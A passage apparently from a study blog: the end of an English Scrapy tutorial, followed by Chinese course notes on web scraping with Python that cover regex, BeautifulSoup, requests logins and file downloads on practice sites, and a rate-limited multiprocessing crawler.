        urls = response.css('a::attr(href)').re(r'^/.+?/$')  # find all sub urls
        for url in urls:
            yield response.follow(url, callback=self.parse)  # it will filter duplication automatically

This tutorial shows you how to write a Scrapy-style spider and gets you started with Scrapy, but Scrapy is much more than the spider itself; there is a lot more to learn, and the place to learn it is of course their own website. One way to run the spider above is sketched below.
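
To run the spider without creating a full Scrapy project, one option is to drive it from Python with CrawlerProcess (a sketch assuming a recent Scrapy, 2.1+, where the FEEDS setting exists; the output file name is arbitrary):

from scrapy.crawler import CrawlerProcess

process = CrawlerProcess(settings={
    "FEEDS": {"results.json": {"format": "json"}},  # write the yielded items to a file
})
process.crawl(MofanSpider)  # the spider class defined above
process.start()  # blocks until the crawl finishes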

    ]]>
    + 官网

    课程

    1.1 了解网页结构

    查看网页源代码

    爬取网页: Scraping tutorial 1 | 莫烦 Python

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    <!DOCTYPE html>
    <html lang="cn">
    <head>
    <meta charset="UTF-8">
    <title>Scraping tutorial 1 | 莫烦 Python</title>
    <link rel="icon" href="https://morvanzhou.github.io/static/img/description/tab_icon.png">
    </head>
    <body>
    <h1>爬虫测试 1</h1>
    <p>
    这是一个在 <a href="https://morvanzhou.github.io/">莫烦 Python</a>
    <a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a> 中的简单测试.
    </p>

    </body>
    </html>
    1
    2
    3
    4
    5
    6
    7
    from urllib.request import urlopen

    html = urlopen(
    "https://yulizi123.github.io/static/scraping/basic-structure.html"
    ).read().decode('utf-8')
    # 因为这个网页有中文元素, 应该用 utf-8 解码
    print(html)
    <!DOCTYPE html><html lang="cn"><head><meta charset="UTF-8"><title>Scraping tutorial 1 | 莫烦 Python</title><link rel="icon" href="https://morvanzhou.github.io/static/img/description/tab_icon.png"></head><body><h1>爬虫测试 1</h1><p>这是一个在 <a href="https://morvanzhou.github.io/">莫烦 Python</a><a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a> 中的简单测试.</p></body></html>

    先导: 正则表达式 Regular Expression

    教程:

    正则表达式 (Regular Expression) 又称 RegEx, 是用来匹配字符的一种工具. 在一大串字符中寻找你需要的内容. 它常被用在很多方面, 比如网页爬虫, 文稿整理, 数据筛选等等.

    从浏览器中读取的代码中找到有用的信息

    简单 Python 匹配
    1
    2
    3
    4
    5
    pattern1 = "cat"
    pattern2 = "bird"
    string = "dog runs to cat"
    print(pattern1 in string)
    print(pattern2 in string)
    TrueFalse
    用正则表达式寻找配对
    1
    2
    3
    4
    5
    6
    7
    import re

    pattern1 = "cat"
    pattern2 = "bird"
    string = "dog runs to cat"
    print(re.search(pattern1, string))
    print(re.search(pattern2, string))
    <re.Match object; span=(12, 15), match='cat'>None

    在 string 12-15 之间找到了字符串 cat

    匹配多种可能 使用[]

    两种可能 run 或 ran

    1
    2
    ptn = r"r[au]n"  # 加了 r 就是表达式, 没加就是字符串
    print(re.search(ptn, "dog runs to cat"))
    <re.Match object; span=(4, 7), match='run'>
    匹配多种可能
    1
    2
    3
    4
    print(re.search(r"r[A-Z]n", "dog runs to cat"))  # 大写字母
    print(re.search(r"r[a-z]n", "dag runs to cat")) # 小写字母
    print(re.search(r"r[0-9]n", "dog r1ns to cat")) # 数字
    print(re.search(r"r[0-9a-z]n", "dog runs to cat")) # 字母或数字
    None<re.Match object; span=(4, 7), match='run'><re.Match object; span=(4, 7), match='r1n'><re.Match object; span=(4, 7), match='run'>
    特殊种类匹配
    数字
    1
    2
    3
    4
    # \d: 匹配所有数字
    print(re.search(r"r\dn", "run r4n"))
    # \d: 匹配所有非数字
    print(re.search(r"r\Dn", "run r4n"))
    <re.Match object; span=(4, 7), match='r4n'><re.Match object; span=(0, 3), match='run'>
    空白
    1
    2
    3
    4
    # \s: 任何空白, 如\t, \n, \r, \f, \v
    print(re.search(r"r\sn", "r\nn r4n"))
    # \S: 任何非空白
    print(re.search(r"r\Sn", "r\nn r4n"))
    <re.Match object; span=(0, 3), match='r\nn'><re.Match object; span=(4, 7), match='r4n'>
    所有数字和下划线_
    1
    2
    3
    4
    # \w: [a-zA-Z0-9_]
    print(re.search(r"r\wn", "r\nn r4n"))
    # \W: 与\w 相反
    print(re.search(r"r\Wn", "r\nn r4n"))
    <re.Match object; span=(4, 7), match='r4n'><re.Match object; span=(0, 3), match='r\nn'>
    空白字符
    1
    2
    3
    4
    5
    6
    # \b: 空格
    print(re.search(r"\bruns\b", "dog runs to cat"))
    print(re.search(r"\bruns\b", "dog runsto cat"))
    # \B: 非空格
    print(re.search(r"\Bruns\B", "dog runs to cat"))
    print(re.search(r"\Bruns\B", "dogrunsto cat"))
    <re.Match object; span=(4, 8), match='runs'>NoneNone<re.Match object; span=(3, 7), match='runs'>
    特殊字符 任意字符
    1
    2
    3
    4
    # \\: 匹配反斜杠\
    print(re.search(r"runs\\", "runs\ to me"))
    # .: 匹配除了\n 外的任何字符
    print(re.search(r"r.ns", "r[ns to me"))
    <re.Match object; span=(0, 5), match='runs\\'><re.Match object; span=(0, 4), match='r[ns'>
    句尾句首
    1
    2
    3
    4
    # ^: 在句首匹配
    print(re.search(r"^dog", "dog runs to cat"))
    # $: 在句尾匹配
    print(re.search(r"cat$", "dog runs to cat"))
    <re.Match object; span=(0, 3), match='dog'><re.Match object; span=(12, 15), match='cat'>
    是否
    1
    2
    3
    # ()?: 无论括号内是否有内容, 都会被匹配
    print(re.search(r"Mon(day)?", "Monday"))
    print(re.search(r"Mon(day)?", "Mon"))
    <re.Match object; span=(0, 6), match='Monday'><re.Match object; span=(0, 3), match='Mon'>
    多行匹配
    1
    2
    3
    4
    5
    6
    7
    # 多行情况下
    string = """
    dog runs to cat.
    I run to dog.
    """
    print(re.search(r"^I", string))
    print(re.search(r"^I", string, flags=re.M)) # 增加 flag 匹配多行
    None<re.Match object; span=(18, 19), match='I'>
    0 或多次
    1
    2
    3
    # *: 出现 0 或多次都会被匹配
    print(re.search(r"ab*", "a"))
    print(re.search(r"ab*", "abbbbbbb"))
    <re.Match object; span=(0, 1), match='a'><re.Match object; span=(0, 8), match='abbbbbbb'>
    1 或多次
    1
    2
    3
    # +: 出现 1 或多次都会被匹配
    print(re.search(r"ab+", "a"))
    print(re.search(r"ab+", "abbbbbbb"))
    None<re.Match object; span=(0, 8), match='abbbbbbb'>
    可选次数
    1
    2
    3
    # {n,m}: 出现 n-m 次之间都会被匹配(逗号后面不能加空格)
    print(re.search(r"ab{2,10}", "a"))
    print(re.search(r"ab{2,10}", "abbbbb"))
    None<re.Match object; span=(0, 6), match='abbbbb'>
    group 组()
    1
    2
    3
    4
    5
    6
    # \d+ 数字出现了 1 次或多次
    # .+ 匹配所有除了\n 外所有的字符
    match = re.search(r"(\d+), Date: (.+)", "ID: 021523, Date: Feb/12/2017")
    print(match.group())
    print(match.group(1))
    print(match.group(2))
    021523, Date: Feb/12/2017021523Feb/12/2017
    组命名 ?P<组名>
    1
    2
    3
    4
    match = re.search(r"(?P<id>\d+), Date: (?P<date>.+)", "ID: 021523, Date: Feb/12/2017")
    print(match.group())
    print(match.group("id"))
    print(match.group("date"))
    021523, Date: Feb/12/2017021523Feb/12/2017
    findall 寻找所有匹配
    1
    2
    3
    4
    print(re.findall(r"r[ua]n", "run ran ren"))
    # | : 或
    print(re.findall(r"r(u|a)n", "run ran ren"))
    print(re.findall(r"run|ran", "run ran ren"))
    ['run', 'ran']['u', 'a']['run', 'ran']
    re.sub 替换
    1
    print(re.sub(r"r[au]ns", "catches", "dog runs to cat"))
    dog catches to cat
    re.split 分裂
    1
    print(re.split(r"[,;\.]", "a;b;c;d;e"))
    ['a', 'b', 'c', 'd', 'e']
    compile 先编译字符串
    1
    2
    3
    # compile
    compiled_re = re.compile(r"r[ua]n")
    print(compiled_re.search("dog ran to cat"))
    <re.Match object; span=(4, 7), match='ran'>
    小抄

    png

    使用正则表达式爬取网页标题
    1
    2
    3
    4
    5
    import re

    # 读取<title>和</title>之间的内容
    res = re.findall(r"<title>(.+?)</title>", html)
    print("\nPage title is: ", res[0])
    Page title is:  Scraping tutorial 1 | 莫烦 Python
    找到段落信息
    1
    2
    res = re.findall(r"<p>(.*?)</p>", html, flags=re.DOTALL)  # flags=re.DOTALL 选取多行信息
    print("\nPage paragraphs: ", res[0])
    Page paragraphs:  这是一个在 <a href="https://morvanzhou.github.io/">莫烦 Python</a><a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a> 中的简单测试.

    查找所有超链接信息
    1
    2
    res = re.findall(r'href="(.*?)"', html)
    print("\nAll links: ", res)
    All links:  ['https://morvanzhou.github.io/static/img/description/tab_icon.png', 'https://morvanzhou.github.io/', 'https://morvanzhou.github.io/tutorials/data-manipulation/scraping/']

    2.1 BeautifulSoup 解析网页: 基础

    Beautiful Soup 中文文档

    可以使用 BeautifulSoup 进行一个高级的匹配!

    1
    pip install beautifulsoup4
    Requirement already satisfied: beautifulsoup4 in c:\users\gzjzx\anaconda3\lib\site-packages (4.11.1)Requirement already satisfied: soupsieve>1.2 in c:\users\gzjzx\anaconda3\lib\site-packages (from beautifulsoup4) (2.3.1)Note: you may need to restart the kernel to use updated packages.

    BeautifulSoup 简单的用法

    导入网页信息
    1
    2
    3
    4
    5
    6
    7
    from bs4 import BeautifulSoup
    from urllib.request import urlopen

    html = urlopen(
    "https://yulizi123.github.io/static/scraping/basic-structure.html"
    ).read().decode('utf-8')
    print(html)
    <!DOCTYPE html><html lang="cn"><head><meta charset="UTF-8"><title>Scraping tutorial 1 | 莫烦 Python</title><link rel="icon" href="https://morvanzhou.github.io/static/img/description/tab_icon.png"></head><body><h1>爬虫测试 1</h1><p>这是一个在 <a href="https://morvanzhou.github.io/">莫烦 Python</a><a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a> 中的简单测试.</p></body></html>
    把获得的网页信息"喂给"BeautifulSoup
    1
    2
    3
    soup = BeautifulSoup(html, features='lxml')  # 解析形式: lxml
    print(soup.h1) # 选出 h1
    print('\n', soup.p) # 选出 p
    <h1>爬虫测试 1</h1> <p>这是一个在 <a href="https://morvanzhou.github.io/">莫烦 Python</a><a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a> 中的简单测试.</p>
    1
    2
    3
    all_href = soup.find_all('a')  # 找到所有<a>属性
    all_href = [l['href'] for l in all_href]
    print(all_href)
    ['https://morvanzhou.github.io/', 'https://morvanzhou.github.io/tutorials/data-manipulation/scraping/']
    1
    2
    all_href = soup.find_all('a')
    print(all_href)
    [<a href="https://morvanzhou.github.io/">莫烦 Python</a>, <a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫教程</a>]
    1
    2
    3
    all_href = soup.find_all('a')
    for l in all_href:
    print(l['href'])
    https://morvanzhou.github.io/https://morvanzhou.github.io/tutorials/data-manipulation/scraping/

    2.2 BeautifulSoup 解析网页: CSS

    1
    2
    3
    4
    5
    6
    7
    from bs4 import BeautifulSoup
    from urllib.request import urlopen

    html = urlopen(
    "https://yulizi123.github.io/static/scraping/list.html"
    ).read().decode('utf-8')
    print(html)
    <!DOCTYPE html><html lang="cn"><head><meta charset="UTF-8"><title>爬虫练习 列表 class | 莫烦 Python</title><style>.jan {background-color: yellow;}.feb {font-size: 25px;}.month {color: red;}</style></head><body><h1>列表 爬虫练习</h1><p>这是一个在 <a href="https://morvanzhou.github.io/" >莫烦 Python</a> 的 <a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/" >爬虫教程</a>里无敌简单的网页, 所有的 code 让你一目了然, 清晰无比.</p><ul><li class="month">一月</li><ul class="jan"><li>一月一号</li><li>一月二号</li><li>一月三号</li></ul><li class="feb month">二月</li><li class="month">三月</li><li class="month">四月</li><li class="month">五月</li></ul></body></html>
    1
    2
    3
    4
    5
    6
    soup = BeautifulSoup(html, features='lxml')
    # 用类名做匹配
    month = soup.find_all('li', {"class": "month"}) # 使用字典 查找<li>中 class 类中要包含 month 这个单词
    for m in month:
    print(m) # 如果只打印 m
    print(m.get_text()) # 显示里面的文字
    <li class="month">一月</li>一月<li class="feb month">二月</li>二月<li class="month">三月</li>三月<li class="month">四月</li>四月<li class="month">五月</li>五月
    1
    2
    jan = soup.find('ul', {"class": "jan"})
    print(jan)
    <ul class="jan"><li>一月一号</li><li>一月二号</li><li>一月三号</li></ul>
    1
    2
    3
    d_jan = jan.find_all('li')  # 将 jan 作为一个父对象
    for d in d_jan:
    print(d.get_text())
    一月一号一月二号一月三号

    2.3 BeautifulSoup 解析网页: 正则表达

    1
    2
    3
    4
    5
    6
    7
    8
    from bs4 import BeautifulSoup
    from urllib.request import urlopen
    import re

    html = urlopen(
    "https://yulizi123.github.io/static/scraping/table.html"
    ).read().decode('utf-8')
    print(html)
    <!DOCTYPE html><html lang="cn"><head><meta charset="UTF-8"><title>爬虫练习 表格 table | 莫烦 Python</title><style>img {width: 250px;}table{width:50%;}td{margin:10px;padding:15px;}</style></head><body><h1>表格 爬虫练习</h1><p>这是一个在 <a href="https://morvanzhou.github.io/" >莫烦 Python</a> 的 <a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/" >爬虫教程</a>里无敌简单的网页, 所有的 code 让你一目了然, 清晰无比.</p><br/><table id="course-list"><tr><th>分类</th><th>名字</th><th>时长</th><th>预览</th></tr><tr id="course1" class="ml"><td>机器学习</td><td><a href="https://morvanzhou.github.io/tutorials/machine-learning/tensorflow/">Tensorflow 神经网络</a></td><td>2:00</td><td><img src="https://morvanzhou.github.io/static/img/course_cover/tf.jpg"></td></tr><tr id="course2" class="ml"><td>机器学习</td><td><a href="https://morvanzhou.github.io/tutorials/machine-learning/reinforcement-learning/">强化学习</a></td><td>5:00</td><td><img src="https://morvanzhou.github.io/static/img/course_cover/rl.jpg"></td></tr><tr id="course3" class="data"><td>数据处理</td><td><a href="https://morvanzhou.github.io/tutorials/data-manipulation/scraping/">爬虫</a></td><td>3:00</td><td><img src="https://morvanzhou.github.io/static/img/course_cover/scraping.jpg"></td></tr></table></body></html>

    查找所有图片链接

    1
    2
    3
    4
    5
    soup = BeautifulSoup(html, features='lxml')

    img_links = soup.find_all("img", {"src": re.compile('.*?\.jpg')})
    for link in img_links:
    print(link['src'])
    https://morvanzhou.github.io/static/img/course_cover/tf.jpghttps://morvanzhou.github.io/static/img/course_cover/rl.jpghttps://morvanzhou.github.io/static/img/course_cover/scraping.jpg

    设定特定的匹配规则

    1
    2
    3
    4
    course_links = soup.find_all(
    'a', {'href': re.compile('https://morvan.*')})
    for link in course_links:
    print(link['href'])
    https://morvanzhou.github.io/https://morvanzhou.github.io/tutorials/data-manipulation/scraping/https://morvanzhou.github.io/tutorials/machine-learning/tensorflow/https://morvanzhou.github.io/tutorials/machine-learning/reinforcement-learning/https://morvanzhou.github.io/tutorials/data-manipulation/scraping/

    2.4 小练习: 爬百度百科

    设置源地址

    1
    2
    3
    4
    5
    6
    7
    from bs4 import BeautifulSoup
    from urllib.request import urlopen
    import re
    import random

    base_url = "https://baike.baidu.com"
    his = ["/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711"]

    输出网址

    1
    2
    3
    4
    url = base_url + his[-1]  # 添加 his 列表中的最后一个, 合并成网址
    html = urlopen(url).read().decode('utf-8')
    soup = BeautifulSoup(html, features='lxml')
    print(soup.find('h1').get_text(), '\turl:', his[-1])
    网络爬虫 url: /item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711

    爬取链接

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    # 找到合法链接
    # 分析链接的规律: 所有超链接都有<a target=_blank href XXX
    # 以/item/开头
    sub_urls = soup.find_all("a", {"target": "_blank", "href": re.compile("/item/(%.{2})+$")})

    if len(sub_urls) != 0:
    his.append(random.sample(sub_urls, 1)[0]['href'])
    else:
    # 没有找到合法链接
    his.pop()
    print(his)
    ['/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711', '/item/%E7%BD%91%E7%BB%9C%E6%95%B0%E6%8D%AE']

    加入循环

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    from bs4 import BeautifulSoup
    from urllib.request import urlopen
    import re
    import random

    base_url = "https://baike.baidu.com"
    his = ["/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711"]

    for i in range(20): # 先爬 20 个
    url = base_url + his[-1] # 添加 his 列表中的最后一个, 合并成网址
    html = urlopen(url).read().decode('utf-8')
    soup = BeautifulSoup(html, features='lxml')
    print(soup.find('h1').get_text(), '\turl:', his[-1])

    sub_urls = soup.find_all("a", {"target": "_blank", "href": re.compile("/item/(%.{2})+$")})

    if len(sub_urls) != 0:
    his.append(random.sample(sub_urls, 1)[0]['href'])
    else:
    # 没有找到合法链接
    his.pop()
    print(his)
    网络爬虫 url: /item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711搜索引擎 url: /item/%E6%90%9C%E7%B4%A2%E5%BC%95%E6%93%8E百度 url: /item/%E7%99%BE%E5%BA%A6百度旅游 url: /item/%E7%99%BE%E5%BA%A6%E6%97%85%E6%B8%B8上地 url: /item/%E4%B8%8A%E5%9C%B0北至 url: /item/%E5%8C%97%E8%87%B3西京赋 url: /item/%E8%A5%BF%E4%BA%AC%E8%B5%8B缘竿 url: /item/%E7%BC%98%E7%AB%BF西京赋 url: /item/%E8%A5%BF%E4%BA%AC%E8%B5%8B扛鼎 url: /item/%E6%89%9B%E9%BC%8E任鄙 url: /item/%E4%BB%BB%E9%84%99孟说 url: /item/%E5%AD%9F%E8%AF%B4乌获 url: /item/%E4%B9%8C%E8%8E%B7秦国 url: /item/%E7%A7%A6%E5%9B%BD雍城 url: /item/%E9%9B%8D%E5%9F%8E秦德公 url: /item/%E7%A7%A6%E5%BE%B7%E5%85%AC秦宪公 url: /item/%E7%A7%A6%E5%AE%81%E5%85%AC秦静公 url: /item/%E7%A7%A6%E9%9D%99%E5%85%AC秦文公 url: /item/%E7%A7%A6%E6%96%87%E5%85%AC宝鸡 url: /item/%E5%AE%9D%E9%B8%A1%E5%B8%82['/item/%E7%BD%91%E7%BB%9C%E7%88%AC%E8%99%AB/5162711', '/item/%E6%90%9C%E7%B4%A2%E5%BC%95%E6%93%8E', '/item/%E7%99%BE%E5%BA%A6', '/item/%E7%99%BE%E5%BA%A6%E6%97%85%E6%B8%B8', '/item/%E4%B8%8A%E5%9C%B0', '/item/%E5%8C%97%E8%87%B3', '/item/%E8%A5%BF%E4%BA%AC%E8%B5%8B', '/item/%E6%89%9B%E9%BC%8E', '/item/%E4%BB%BB%E9%84%99', '/item/%E5%AD%9F%E8%AF%B4', '/item/%E4%B9%8C%E8%8E%B7', '/item/%E7%A7%A6%E5%9B%BD', '/item/%E9%9B%8D%E5%9F%8E', '/item/%E7%A7%A6%E5%BE%B7%E5%85%AC', '/item/%E7%A7%A6%E5%AE%81%E5%85%AC', '/item/%E7%A7%A6%E9%9D%99%E5%85%AC', '/item/%E7%A7%A6%E6%96%87%E5%85%AC', '/item/%E5%AE%9D%E9%B8%A1%E5%B8%82', '/item/%E7%BA%A2%E6%B2%B3%E8%B0%B7']

    在此建议大家, 因为有反爬虫机制, 大家最好给自己的程序加上 time.sleep(2), 不然你的程序也不能访问百度百科了

    3.1 Post 登录 Cookies(Requests)

    其实在加载网页的时候, 有几种类型, 而这几种类型就是你打开网页的关键. 最重要的类型 (method) 就是 getpost (当然还有其他的, 比如 head, delete). 刚接触网页构架的朋友可能又会觉得有点懵逼了. 这些请求的方式到底有什么不同? 他们又有什么作用?

    我们就来说两个重要的, get, post, 95% 的时间, 你都是在使用这两个来请求一个网页.

    post
    账号登录
    搜索内容
    上传图片
    上传文件
    往服务器传数据 等

    get
    正常打开网页
    不往服务器传数据

    安装 requests

    1
    pip install requests
    Requirement already satisfied: requests in c:\users\gzjzx\anaconda3\lib\site-packages (2.27.1)Requirement already satisfied: charset-normalizer~=2.0.0 in c:\users\gzjzx\anaconda3\lib\site-packages (from requests) (2.0.4)Requirement already satisfied: idna<4,>=2.5 in c:\users\gzjzx\anaconda3\lib\site-packages (from requests) (3.3)Requirement already satisfied: certifi>=2017.4.17 in c:\users\gzjzx\anaconda3\lib\site-packages (from requests) (2021.10.8)Requirement already satisfied: urllib3<1.27,>=1.21.1 in c:\users\gzjzx\anaconda3\lib\site-packages (from requests) (1.26.9)Note: you may need to restart the kernel to use updated packages.

    使用 requests

    get 请求
    1
    2
    3
    4
    5
    6
    7
    import requests
    # import webbrowser

    param = {"wd": "莫烦 python"}
    r = requests.get('http://www.baidu.com/s', params=param)
    print(r.url)
    # webbrowser.open(r.url) # 打开这个网页: 使用百度搜索 莫烦 python
    http://www.baidu.com/s?wd=%E8%8E%AB%E7%83%A6python
    post 请求

    https://pythonscraping.com/pages/files/form.html

    1
    2
    3
    data = {'firstname': '莫烦', 'lastname': '周'}
    r = requests.post('https://pythonscraping.com/pages/files/processing.php', data=data)
    print(r.text)
    Hello there, 莫烦 周!

    使用 get 请求会返回信息, 而 post 请求不会

    上传文件

    https://pythonscraping.com/files/form2.html

    上传图片也是post的一种

    1
    2
    3
    4
    file = {'uploadFile': open('./images.png', 'rb')}
    r = requests.post(
    'https://pythonscraping.com/pages/files/processing2.php', files=file)
    print(r.text)
    uploads/images.pngThe file image.png has been uploaded.
    登录

    https://pythonscraping.com/pages/cookies/login.html

    1
    2
    3
    4
    5
    6
    7
    8
    payload = {'username': 'Morvan', 'password': 'password'}
    r = requests.post(
    'https://pythonscraping.com/pages/cookies/welcome.php',
    data=payload)
    print(r.cookies.get_dict()) # 网页的 cookie 内容
    r = requests.get('https://pythonscraping.com/pages/cookies/profile.php'
    ,cookies=r.cookies)
    print(r.text)
    {'loggedin': '1', 'username': 'Morvan'}Hey Morvan! Looks like you're still logged into the site!
    1
    2
    3
    4
    5
    6
    session = requests.Session()
    payload = {'username': 'Morvan', 'password': 'password'}
    r = session.post('https://pythonscraping.com/pages/cookies/welcome.php', data=payload)
    print(r.cookies.get_dict())
    r = session.get("https://pythonscraping.com/pages/cookies/welcome.php")
    print(r.text)
    {'loggedin': '1', 'username': 'Morvan'}<h2>Welcome to the Website!</h2>You have logged in successfully! <br/><a href="profile.php">Check out your profile!</a>

    3.2 下载文件

    设置保存路径和图片地址

    1
    2
    3
    4
    import os

    os.makedirs('./img/', exist_ok=True) # 设置保存路径
    IMAGE_URL = "http://www.baidu.com/img/flexible/logo/pc/result.png" # 设置图片地址

    urlretrive url 检索

    1
    2
    3
    from urllib.request import urlretrieve

    urlretrieve(IMAGE_URL, './img/images1.png')
    ('./img/images1.png', <http.client.HTTPMessage at 0x27e707a86a0>)

    使用 requests

    wb 是二进制格式打开一个文件, 源文件存在的话从头编辑, 替代原文件, 不存在的话则创建新文件

    1
    2
    3
    4
    5
    import requests

    r = requests.get(IMAGE_URL)
    with open('./img/images2.png', 'wb') as f:
    f.write(r.content)

    如果要下载一个较大的文件

    1
    2
    3
    4
    r = requests.get(IMAGE_URL, stream=True)
    with open('./img/images3.png', 'wb') as f:
    for chunk in r.iter_content(chunk_size=32): # 每次写入文件时写入 32 个字节
    f.write(chunk)

    3.3 小练习: 下载国家地理美图

    每日一图-地理中文网—《国家地理》杂志中文网站

    好像网站更新了, 有了反爬虫功能? 改成爬取February 27, 2018 | iDaily 每日环球视野

    设置地址

    1
    2
    3
    4
    from bs4 import BeautifulSoup
    import requests

    URL = "http://m.idai.ly/se/a193iG?1661356800"

    设置爬虫参数

    png

    注意到图片都放在 div class="photo"的父对象中

    1
    2
    3
    html = requests.get(URL).text
    soup = BeautifulSoup(html, 'lxml')
    img_ul = soup.find_all('div', {'class': 'photo'})
    1
    img_ul
    [<div class="photo"><img src="http://pic.yupoo.com/fotomag/H9yil7z0/TaRLX.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/757ee474/10530738.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/946704b4/66933a50.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/7aa989ff/b4882755.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/cb529779/d8c7a395.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/2e45a0cd/85b8cc7b.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/e1989816/20e2ebdc.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/42034c62/e67c02ab.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/267e386a/88c891b6.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/65ad43ae/e5d8c29e.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/1213e2a1/3faaaedd.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/d009c863/b6f97eca.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/76c66979/84fa84fa.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/9023854c/619b3b2e.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/8a75067c/2a3ecbf9.jpg"/><div class="overlay"></div></div>, <div class="photo"><img src="http://pic.yupoo.com/fotomag/30e65430/a1f9a680.jpg"/><div class="overlay"></div></div>]

    设置保存文件夹

    1
    2
    3
    import os

    os.makedirs('./img/', exist_ok=True)

    下载

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    for ul in img_ul:
    imgs = ul.find_all('img')
    for img in imgs:
    url = img['src']
    r = requests.get(url, stream=True)
    image_name = url.split('/')[-1]
    with open('./img/%s' % image_name, 'wb') as f:
    for chunk in r.iter_content(chunk_size=128):
    f.write(chunk)
    print('Saved %s' % image_name)
    Saved TaRLX.jpgSaved 10530738.jpgSaved 66933a50.jpgSaved b4882755.jpgSaved d8c7a395.jpgSaved 85b8cc7b.jpgSaved 20e2ebdc.jpgSaved e67c02ab.jpgSaved 88c891b6.jpgSaved e5d8c29e.jpgSaved 3faaaedd.jpgSaved b6f97eca.jpgSaved 84fa84fa.jpgSaved 619b3b2e.jpgSaved 2a3ecbf9.jpgSaved a1f9a680.jpg

    得到爬取的文件:

    png

    4.1 多进程分布式爬虫

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    import multiprocessing as mp
    import time
    from urllib.request import urlopen, urljoin
    from bs4 import BeautifulSoup
    import re

    base_url = "https://mofanpy.com/"

    # 不要持续爬取一个网站的信息, 否则你可能再也登陆不上这个网页
    if base_url != "https://127.0.0.1:4000/": # 如果用外网, 就限制爬取
    restricted_crawl = True
    else:
    restricted_crawl = False

    定义爬取的函数

    1
    2
    3
    4
    def crawl(url):
    response = urlopen(url)
    time.sleep(0.1) # 对下载作一个轻微延迟: 0.1 秒
    return response.read().decode()

    解析

    1
    2
    3
    4
    5
    6
    7
    8
    def parse(html):
    soup = BeautifulSoup(html, 'lxml')
    urls = soup.find_all('a', {'href': re.compile('^/.+?$')})
    title = soup.find('h1').get_text().strip()
    # set() 函数创建一个无序不重复元素集,可进行关系测试,删除重复数据,还可以计算交集、差集、并集等。
    page_urls = set([urljoin(base_url, url['href']) for url in urls])
    url = soup.find('meta', {'property': 'og:url'})['content']
    return title, page_urls, url

    常规方式爬取

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    unseen = set([base_url,])
    seen = set()

    count, t1 = 1, time.time()

    while len(unseen) != 0:
    if restricted_crawl and len(seen) > 20:
    break

    print('\nDistributed Crawling...')
    htmls = [crawl(url) for url in unseen]

    print('\nDistributed Parsing...')
    results = [parse(html) for html in htmls]

    print('\nAnalysing...')
    seen.update(unseen)
    unseen.clear()

    for title, page_urls, url in results:
    print(count, title, url)
    count += 1
    unseen.update(page_urls - seen)
    print('Total time: %.1f s' % (time.time() - t1, ))
    Distributed Crawling...Distributed Parsing...Analysing...1 莫烦 Python 主页 http://mofanpy.com/Distributed Crawling...Distributed Parsing...Analysing...2 数据处理 http://mofanpy.com/tutorials/data-manipulation3 有趣的机器学习 http://mofanpy.com/tutorials/machine-learning/ML-intro/4 机器学习 http://mofanpy.com/tutorials/machine-learning5 Python 基础教学 http://mofanpy.com/tutorials/python-basic6 其他效率教程 http://mofanpy.com/tutorials/othersDistributed Crawling...Distributed Parsing...Analysing...7 Numpy 数据怪兽 http://mofanpy.com/tutorials/data-manipulation/numpy8 Matplotlib 画图 http://mofanpy.com/tutorials/data-manipulation/plt9 交互式学 Python http://mofanpy.com/tutorials/python-basic/interactive-python/10 进化算法 (Evolutionary-Algorithm) http://mofanpy.com/tutorials/machine-learning/evolutionary-algorithm/11 强化学习 (Reinforcement Learning) http://mofanpy.com/tutorials/machine-learning/reinforcement-learning/12 自然语言处理 http://mofanpy.com/tutorials/machine-learning/nlp/13 数据的伙伴 Pandas http://mofanpy.com/tutorials/data-manipulation/pandas14 窗口视窗 (Tkinter) http://mofanpy.com/tutorials/python-basic/tkinter/15 有趣的机器学习 http://mofanpy.com/tutorials/machine-learning/ML-intro16 PyTorch http://mofanpy.com/tutorials/machine-learning/torch/17 Keras http://mofanpy.com/tutorials/machine-learning/keras/18 SciKit-Learn http://mofanpy.com/tutorials/machine-learning/sklearn/19 Theano 